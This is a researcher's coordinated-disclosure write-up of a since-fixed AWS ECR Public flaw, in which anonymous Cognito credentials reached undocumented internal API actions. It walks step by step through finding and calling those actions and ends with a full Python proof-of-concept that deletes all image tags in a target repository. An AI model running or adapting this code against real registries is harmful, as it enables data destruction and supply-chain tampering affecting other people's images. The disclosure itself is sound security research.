AWS ECR Public Vulnerability

author_profile
Gafnit Amiga
Tuesday, Dec 13th, 2022

Executive Summary

I discovered a critical AWS Elastic Container Registry Public (ECR Public) vulnerability that allowed external actors to delete, update, and create ECR Public images, layers, and tags in registries and repositories that belong to other AWS Accounts, by abusing undocumented internal ECR Public API actions. Prior to mitigation, this vulnerability could have potentially led to denial of service, data exfiltration, lateral movement, privilege escalation, data destruction, and other multi-variate attack paths that are only limited by the craftiness and goals of the adversary.

By exploiting this vulnerability, a malicious actor could delete all images in the Amazon ECR Public Gallery or update the image contents to inject malicious code. This malicious code is executed on any machine that pulls and runs the image, whether on user’s local machines, Kubernetes clusters or cloud environments. Using this vulnerability an attacker could infect popular images such as CloudWatch agentDatadog agentEKS DistroAmazon Linux and Nginx, all while abusing the trust model of ECR Public as these images would masquerade as being verified and thus undermine the ECR Public supply chain. The top Six most popular (by downloads) images on the ECR Public Gallery combine for around 13 billion downloads and there are several thousands more images stored on ECR Public.

This vulnerability was reported to AWS Security Outreach Team, who immediately responded and worked with the ECR Public team to fix the vulnerability in less than twenty-four hours. AWS has conducted an analysis of the logs and confirmed that the only activity they identified related to the issue was between my research accounts. No customer action is required to remediate the issue. 

AWS Security Bulletin: https://aws.amazon.com/security/security-bulletins/AWS-2022-010/ 

Timeline

  • Nov 15, 2022: The vulnerability was reported to AWS Security. AWS Security Outreach and ECR Public teams validated the vulnerability and started to deploy the fix.
  • Nov 16, 2022: The fix was successfully deployed.
  • Dec 13, 2022: Coordinated disclosure with AWS.

The Amazon ECR Public Gallery is a public portal that lists all public repositories hosted on the Amazon ECR Public service. Popular companies, projects, and services, such as NGINX, Ubuntu, Amazon Linux, and HashiCorp Consul, publish their images in the gallery for public consumption and usage.

Each AWS account is provided with a default Amazon ECR Public Registry that comes with a unique default alias. AWS allows customers to set a custom alias for their Registry to create a meaningful public registry name. For example, in my account, the Amazon ECR Public registry default alias is w8r5q5v0 and I assigned a custom alias of gafresearch as shown in the screenshot below.

Any ECR Public Repository created in the AWS Account is assigned to the Account’s default Amazon ECR Public Registry. Whenever a new ECR Public Repository is created, it is automatically mirrored on the Amazon ECR Public Gallery web application with all its details. I decided to create a new public repository, “gafpubrep”, with a simple Docker Image to better understand how exactly it is presented in the Amazon ECR Public Gallery. My repository URI is public.ecr.aws/w8r5q5v0/gafpubrep, and I have pushed an image with a “latest” tag to it as shown in the screenshot below.

The repository can also be found in the Amazon ECR Public Gallery at https://gallery.ecr.aws/w8r5q5v0/gafpubrep as shown in the screenshot below.

When accessing the Repository “gafpubrep” in the Amazon ECR Public Gallery, the following HTTP POST request is sent in the background as shown in the screenshot below.

Note that the value of the X-Amz-Target HTTP header is SpencerFrontendService.DescribeImageTagsInternal. ECR Public has the DescribeImageTags API action available, but the Internal suffix is odd since the endpoint itself is not internal. Also, the SpencerFrontendService service is unfamiliar and doesn’t have Google results or public mentions likely denoting an internal AWS service or an old codename for the ECR Public Service. Additionally, SpencerFrontendService is referenced again in the X-Amz-TargetHTTP header for requests coming out of the Amazon ECR console. The request is also authenticated using AWS SigV4 and temporary credentials, which are probability not my AWS Console credentials as Amazon ECR Public Gallery application does not request login.

I searched for more Internal actions in the Amazon ECR Public Gallery main JavaScript file and found 12 actions with the Internal suffix. For each action, I searched for a matching API action both in the ECR and ECR Public API documentation. The table below shows the results of this mapping.

Action NameMatching ECR Public
API Action
Matching ECR
API Action
GetRegistryCatalogDataInternalGetRegistryCatalogData 
GetRepositoryCatalogDataInternalGetRepositoryCatalogData 
DescribeImageTagsInternalDescribeImageTags 
BatchGetImageInternal BatchGetImage
GetDownloadUrlForLayerInternal GetDownloadUrlForLayer
SearchRepositoryCatalogDataInternal  
DescribeRepositoryCatalogDataInternal  
DeleteImageForConvergentReplicationInternal  
DeleteTagForConvergentReplicationInternal  
PutImageForConvergentReplicationInternal  
PutLayerForConvergentReplicationInternal  
PutRegistryAliasInternal  

Since Amazon ECR Public Gallery presents only public repository details, I would expect to see only ECR Public API actions, but that was not the case. The Internal actions include 3 ECR Public actions, 2 ECR actions and 7 additional publicly undocumented actions. To better understand these actions, I mapped their triggers to understand what prompts the actions to occur. Simply, I captured which operations in the Amazon ECR Public Gallery UI, Amazon ECR console, or Docker CLI commands causes them. The table below shows the results of this experiment.

Action nameTriggers
GetRegistryCatalogDataInternalWhen accessing a specific public repository page in the gallery such as https://gallery.ecr.aws/w8r5q5v0/gafpubrepWhen accessing a specific public registry page in the gallery such as https://gallery.ecr.aws/ w8r5q5v0/
GetRepositoryCatalogDataInternalWhen accessing a specific public repository page in the gallery such as https://gallery.ecr.aws/w8r5q5v0/gafpubrep
DescribeImageTagsInternalWhen accessing a specific public repository page in the gallery such as https://gallery.ecr.aws/w8r5q5v0/gafpubrep
BatchGetImageInternalDocker client pull image commandDocker client inspect manifest command
GetDownloadUrlForLayerInternalDocker client pull command
SearchRepositoryCatalogDataInternalWhen accessing the main gallery page at https://gallery.ecr.aws/When using the search option
DescribeRepositoryCatalogDataInternalWhen accessing a specific public registry page in the gallery such as https://gallery.ecr.aws/ w8r5q5v0/
DeleteImageForConvergentReplicationInternal 
DeleteTagForConvergentReplicationInternal 
PutImageForConvergentReplicationInternal 
PutLayerForConvergentReplicationInternal 
PutRegistryAliasInternalWhen setting a custom alias for the Amazon ECR Public registry in the AWS ECR console (requires login)

From the table above, ECR Public API actions are triggered from the Amazon ECR Public Gallery application to get the public repositories’ details. The two ECR API actions, BatchGetImageInternal and GetDownloadUrlForLayerInternal, are triggered by the Docker client to support the public pull operation. The undocumented API action PutRegistryAliasInternal is triggered when a request for a custom registry alias is set in the AWS ECR console. We were then left with 4 undocumented Internal API actions for which I couldn’t find their triggers: DeleteImageForConvergentReplicationInternal, DeleteTagForConvergentReplicationInternal, PutImageForConvergentReplicationInternal and PutLayerForConvergentReplicationInternal.

The diagram below summarizes all the observed interactions with the ECR Public internal API.

The diagram includes all 3 optional triggers for the Internal ECR Public API: Docker client, AWS ECR console, and Amazon ECR Public Gallery UI. The same observed flow with the Docker client can trigger the BatchGetImageInternal action using the docker manifest inspect command.

Activating the Undocumented Internal Actions

I wanted to manually invoke Internal actions for two main reasons:

  1. To manipulate the request, test it, and tamper with its parameters.
  2. To invoke the four undocumented actions for which I didn’t find their triggers.

Regarding the four undocumented actions, those actions are the most interesting because they are not “read only” and would (potentially) allow me to Put or Delete images from ECR Public Registries and their associated Repositories, which I do not own.

I started with the DescribeImageTagsactions because I already know its request structure. I first tried to send the request without any authentication and received a "Missing Authentication Token" error. Then, I tried to use my AWS credentials to sign the request and received an “Access Denied” error instead as shown in the screenshot below.

I realized that I must intercept and use the specific identity credentials which are also used by the Amazon ECR Public Gallery as part of the original SigV4 flow observed earlier.

Back to the credentials from the SigV4 signed request, let’s try to find who they belong to and what they can do. During the research on the Internal API actions, I recognized that all requests from the Amazon ECR Public Gallery application are authenticated. The X-Amz-Security-Token header implies that those are temporary credentials of some AWS IAM Role. I searched for the AccessKeyId value to locate the originating request that accepted those temporary credentials. The request I observed is shown in the screenshot below.

This is a request to Amazon Cognito GetCredentialsForIdentity API action to obtain temporary, limited-privilege credentials to access other AWS services. Cognito is an AWS service that provides authentication, authorization, and user management to web, mobile and specific AWS services and applications. Note that the GetCredentialsForIdentity action is a public API, and no credentials are needed to call this API. You can read more specifics about Amazon Cognito identity pools authentication flow here.

I can use those temporary credentials to sign requests to other AWS services’ APIs, including Cognito and ECR Public. I then attempted to use the identity’s temporary credentials to access another Amazon Cognito API, DescribeIdentity as demonstrated in the screenshot below.

From the error above you can see that the temporary credentials belong to the SpencerPortalCognitoInfra-SpencerCognitoUnAuthRole-103M4HZ3UDLSZAWS IAM role, located in an internal AWS Account with the identifier of 421354852932, likely used to host a part of the ECR Public internal services.

Below is a diagram that theoretically demonstrates how I believe the Amazon ECR Public Gallery UI obtains temporary credentials for the SpencerPortalCognitoInfra-SpencerCognitoUnAuthRole role to authenticate and authorize requests to ECR Public internal APIs.

Now that I know how to authenticate against the ECR Public internal API using SpencerPortalCognitoInfra identity, I can invoke the DescribeImageTags action from before. The screenshot below demonstrates the successful API request.

Now that I have successfully invoked one of the Internal actions, I can use a similar technique to invoke the others, focusing on those which would allow me to Put or Delete images from ECR Public Registries and their associated Repositories, which I do not own.

Exploit Proof of Concept: Deleting Image Tags

In this Proof of Concept (POC) I will focus on the DeleteTagForConvergentReplicationInternal API action, but this POC’s approach can be executed against the DeleteImageForConvergentReplicationInternal, PutImageForConvergentReplicationInternal, PutLayerForConvergentReplicationInternal and all other API actions.

Since the DeleteTagForConvergentReplicationInternal action is undocumented, I need to discover the request structure. When I try to send the request with an empty body, I get an error specifying that the imageTagEntity parameter is required as shown in the screenshot below.

I went back to the Amazon ECR Public Gallery main JavaScript file and searched for the “DeleteTagForConvergentReplicationInternal” string. This led me to a JSON structure that describes the expected input and output of the action. The image below highlights this structure.

The input is indeed the “imageTagEntity” object that has a structure of shape “S2j”. The image below shows the structure of shape “S2j” which contains the entityId, repositoryEntityId, imageManifestEntityId, tag, createdAt, updatedAt, and deletedAt fields.

Note that all fields are atomic types and not structures. Their type is string (empty means string) or timestamp. In other structures there were also int (integer) or long types as well. Finding the fields’ values required trial and error along with combining values from other actions results. Finally, I had the full flow to obtain all required details. Let’s use my test public repository, https://gallery.ecr.aws/w8r5q5v0/gafpubrep, that has the sample image with the “latest” tag public.ecr.aws/w8r5q5v0/gafpubrep:latest as an example.

  • entityId – A random UUID V4.
  • tag – The tag name we would like to delete – in my example it’s “latest”.
  • repositoryEntityId and imageManifestEntityId – To get these values we need to use the GetDownloadUrlForLayerInternal action. This action returns a URL from where you can download the layer’s content. If we request the download URL of the manifest, the returned URL will include the UUIDs both of repositoryEntityId and imageManifestEntityId. But, to request the download URL of the manifest, we need to know its digest. We can get the manifest’s digest from BatchGetImageInternal response. But, BatchGetImageInternal requires the image digest, which we can get from DescribeImageTagsInternal response. Putting it all together, here is the flow.

1. Send request to DescribeImageTagsInternal – Use the target registry alias and repository name to set the values of registryAliasName and repositoryName parameters respectively as shown below.

2. Save the values of imageDigest and createdAt for next steps.
3. Send request to BatchGetImageInternal – Use the registry alias, repository name, image tag, and imageDigest from before to set the values of registryAliasName, repositoryName, imageTag, and imageDigest parameters respectively.

4. Save the manifest’s digest value from the response at images[0].imageManifest.config.digest (parse imageManifest as JSON).
5. Send request to GetDownloadUrlForLayerInternal – Use the registry alias, repository name, and the manifest’s digest from before to set the values of registryAliasName, repositoryName, and layerDigest parameters respectively.

6. Extract the UUIDs of repositoryEntityId and imageManifestEntityId from the downloadUrl in the response:
https://xxxx.cloudfront.net/xxxxxx-<account_id>-<repositoryEntityId>/<imageManifestEntityId>?...

  • createdAt, updatedAt and deletedAt – Use the createdAt value saved from the DescribeImageTagsInternal response.

Now that we have the full request body, we can send the request to the DeleteTagForConvergentReplicationInternal API action as shown below.

When we refresh the gafpubrep repository page https://gallery.ecr.aws/w8r5q5v0/gafpubrep in the Amazon ECR Public Gallery, we can see that all images were deleted as shown in the screenshot below.

Also, when I login to my personal AWS ECR console, I can see that the tags were also removed there as shown in the screenshot below.

The Python script provided below executes all steps described above to activate the DeleteTagForConvergentReplicationInternal API action.import datetime import hashlib import hmac import sys import json import re import uuid import requests import boto3 # Set this value to the target registry alias registry_alias_name = 'w8r5q5v0' # Set this value to the target repository name repository_name = 'gafpubrep' DESCRIBE_REPOSITORY_CATALOG_DATA = 'SpencerFrontendService.DescribeRepositoryCatalogDataInternal' DESCRIBE_IMAGE_TAGS = 'SpencerFrontendService.DescribeImageTagsInternal' BATCH_GET_IMAGE = 'SpencerFrontendService.BatchGetImageInternal' GET_DOWNLOAD_URL_FOR_LAYER = 'SpencerFrontendService.GetDownloadUrlForLayerInternal' DELETE_TAG_FOR_CONVERGENT_REPLICATION = 'SpencerFrontendService.DeleteTagForConvergentReplicationInternal' access_key_id = '' secret_key = '' session_token = '' def init_spencer_creds(): """ Uses Amazon Cognito GetCredentialsForIdentity to get temporary credentials for SpencerPortalCognitoInfra-SpencerCognitoUnAuthRole Role. I'm using GetCredentialsForIdentity with an IdentityId I have already issued so as not to overflow the IdentityPool with new GetId each time. :return: temporary credentials for SpencerPortalCognitoInfra- SpencerCognitoUnAuthRole Role. """ client = boto3.client('cognito-identity') response = client.get_credentials_for_identity( IdentityId='us-east-1:4efdd100-5f28-4444-9dc6-8b201cfef87a' ) if not response["Credentials"]: print("Error while getting temporary credentials.") sys.exit(1) global access_key_id, secret_key, session_token access_key_id = response["Credentials"]["AccessKeyId"] secret_key = response["Credentials"]["SecretKey"] session_token = response["Credentials"]["SessionToken"] def sign(key, msg): return hmac.new(key, msg.encode("utf-8"), hashlib.sha256).digest() def getSignatureKey(key, date_stamp, regionName, serviceName): kDate = sign(('AWS4' + key).encode('utf-8'), date_stamp) kRegion = sign(kDate, regionName) kService = sign(kRegion, serviceName) kSigning = sign(kService, 'aws4_request') return kSigning def send_request(request_parameters, amz_target): method = 'POST' service = 'ecr-public' host = 'ecr-public.us-east-1.amazonaws.com' region = 'us-east-1' endpoint = 'https://ecr-public.us-east-1.amazonaws.com' content_type = 'application/x-amz-json-1.1' t = datetime.datetime.utcnow() amz_date = t.strftime('%Y%m%dT%H%M%SZ') date_stamp = t.strftime('%Y%m%d') canonical_uri = '/' canonical_querystring = '' canonical_headers = 'content-type:' + content_type + '\n' + 'host:' + host + '\n' + 'x-amz-date:' + amz_date + '\n' + 'x-amz-target:' + amz_target + '\n' signed_headers = 'content-type;host;x-amz-date;x-amz-target' payload_hash = hashlib.sha256(request_parameters.encode('utf-8')).hexdigest() # Create canonical request canonical_request = method + '\n' + canonical_uri + '\n' + canonical_querystring + '\n' + canonical_headers + '\n' + signed_headers + '\n' + payload_hash # Create string to sign algorithm = 'AWS4-HMAC-SHA256' credential_scope = date_stamp + '/' + region + '/' + service + '/' + 'aws4_request' string_to_sign = algorithm + '\n' + amz_date + '\n' + credential_scope + '\n' + hashlib.sha256( canonical_request.encode('utf-8')).hexdigest() signing_key = getSignatureKey(secret_key, date_stamp, region, service) signature = hmac.new(signing_key, (string_to_sign).encode('utf-8'), hashlib.sha256).hexdigest() authorization_header = algorithm + ' ' + 'Credential=' + access_key_id + '/' + credential_scope + ', ' + 'SignedHeaders=' + signed_headers + ', ' + 'Signature=' + signature headers = {'Content-Type': content_type, 'X-Amz-Date': amz_date, 'X-Amz-Target': amz_target, 'X-Amz-Security-Token': session_token, 'Authorization': authorization_header} response = requests.post(endpoint, data=request_parameters, headers=headers) return response.json() def describe_repository_catalog_data(registry_alias_name): request_parameters = '{"' \ f'registryAliasName": "{registry_alias_name}"' \ '}' return send_request(request_parameters, amz_target=DESCRIBE_REPOSITORY_CATALOG_DATA) def describe_image_tags(registry_alias_name, repository_name): request_parameters = '{"' \ f'registryAliasName": "{registry_alias_name}", ' \ f'"repositoryName": "{repository_name}"' \ '}' return send_request(request_parameters, amz_target=DESCRIBE_IMAGE_TAGS) def batch_get_image(registry_alias_name, repository_name, image_digest, image_tag): request_parameters = '{"' \ f'registryAliasName": "{registry_alias_name}", ' \ f'"repositoryName": "{repository_name}", ' \ '"imageIds": [{' \ f'"imageDigest":"{image_digest}", ' \ f'"imageTag":"{image_tag}"' \ '}]' \ '}' return send_request(request_parameters, amz_target=BATCH_GET_IMAGE) def get_download_url_for_layer(registry_alias_name, repository_name, layer_digest): request_parameters = '{"' \ f'registryAliasName": "{registry_alias_name}", ' \ f'"repositoryName": "{repository_name}", ' \ f'"layerDigest":"{layer_digest}"' \ '}' return send_request(request_parameters, amz_target=GET_DOWNLOAD_URL_FOR_LAYER) def delete_tag_for_convergent_replication(repository_entity_id, image_manifest_entity_id, tag, created_at, updated_at, deleted_at): random_uuid = uuid.uuid4() request_parameters = '{' \ '"imageTagEntity": {' \ f'\"entityId\":\"{random_uuid}\", ' \ f'\"repositoryEntityId\":\"{repository_entity_id}\", ' \ f'\"imageManifestEntityId\":\"{image_manifest_entity_id}\", ' \ f'\"tag\":\"{tag}\", ' \ f'\"createdAt\":{created_at}, ' \ f'\"updatedAt\":{updated_at}, ' \ f'\"deletedAt\":{deleted_at}' \ '}' \ '}' return send_request(request_parameters, amz_target=DELETE_TAG_FOR_CONVERGENT_REPLICATION) def get_repositories(registry_alias_name): response = describe_repository_catalog_data(registry_alias_name) repositories_list = [] for r in response["repositories"]: repositories_list.append(r["repositoryName"]) return repositories_list def get_image_tags_details(registry_alias_name, repository_name): response = describe_image_tags(registry_alias_name, repository_name) return response["imageTagDetails"] def delete_tag(registry_alias_name, repository_name, image_digest, image_tag, image_created_at): response = batch_get_image(registry_alias_name, repository_name, image_digest, image_tag) image_manifest = json.loads(response["images"][0]["imageManifest"]) image_manifest_digest = image_manifest["config"]["digest"] response = get_download_url_for_layer(registry_alias_name, repository_name, image_manifest_digest) download_url = response["downloadUrl"] z = re.match( r'https:\/\/[^\/]+\/[0-9a-fA-F]{6}-\d+-([0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12})\/([0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}).*', download_url) if z: repository_entity_id = z.group(1) image_manifest_entity_id = z.group(2) delete_tag_for_convergent_replication(repository_entity_id, image_manifest_entity_id, image_tag, created_at=image_created_at, updated_at=image_created_at, deleted_at=image_created_at) init_spencer_creds() # You can use SearchRepositoryCatalogDataInternal to get a list of all registries. # You can loop over all repositories in the registry # repositories_list = get_repositories(registry_alias_name) image_tags_details_list = get_image_tags_details(registry_alias_name, repository_name) for tag in image_tags_details_list: image_digest = tag["imageDetail"]["imageDigest"] image_tag = tag["imageTag"] image_created_at = tag["createdAt"] print(f"Deleting public.ecr.aws/{registry_alias_name}/{repository_name}:{image_tag}") delete_tag(registry_alias_name, repository_name, image_digest, image_tag, image_created_at) print("Done.")

Conclusion

Supply chain attacks are hard to detect and difficult to prevent. The software supply chain is any person, process, or technology which interacts with the software development lifecycle: this can be individual developers, software packages, middleware, firmware, hardware, source code, Continuous Integration (CI) systems, and more. Given the wide breadth and depth of a software supply chain, this makes it exceptionally hard to cover all ground.

While SolarWinds was not the only technology targeted in 2019, supply chain attacks circumvent trust and can present itself in multiple vectors which is what makes it so potentially damaging. In the case of this ECR Public vulnerability, it is a classic example of a deep software supply chain attack. An adversary could do what I did and either remove or push new images which would appear as verified Registries belonging to Amazon, Canonical, and other popular companies, and providers. It is difficult to guess exactly what would happen, but nearly any goal ranging from destruction and exfiltration to persistence and lateral movement can be executed from within a containerized environment.

To further put the potential impact of this vulnerability into perspective, just the Top Six most popular (by downloads) images on the ECR Public Gallery combine for around 13 billion downloads and there are several thousands more images stored on ECR Public. An analysis of Panoptica customers shows that 26% of all Kubernetes clusters have at least one Pod that pulls an image from public.ecr.aws.

Software supply chain attacks are still difficult to pull off, but there are practices that security teams can implement to better protect their software supply chain. Whenever relying on a third party, always verify the digests and signatures of the artifacts. Continuously use static code analysis, container vulnerability management, and layer exploration tools to examine images for negative changes. Always use the minimum necessary number of dependencies and identity permissions for an image to avoid lateral movement.

Acknowledgements

I want to give a special thanks to Alexis Fahrney, Ryan Nolette, Dan Urson and the rest of the AWS Security Outreach team for their continued partnership, commitment and amazing work.

Popup Image